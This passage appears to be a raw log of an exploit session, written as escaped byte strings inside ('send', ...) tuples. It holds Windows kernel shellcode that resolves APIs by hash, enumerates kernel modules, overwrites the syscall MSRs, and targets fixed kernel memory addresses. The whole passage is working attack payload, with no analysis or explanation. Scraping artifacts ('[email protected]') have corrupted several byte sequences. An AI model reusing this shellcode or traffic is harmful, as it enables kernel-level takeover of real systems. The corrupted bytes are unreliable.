f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 15, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\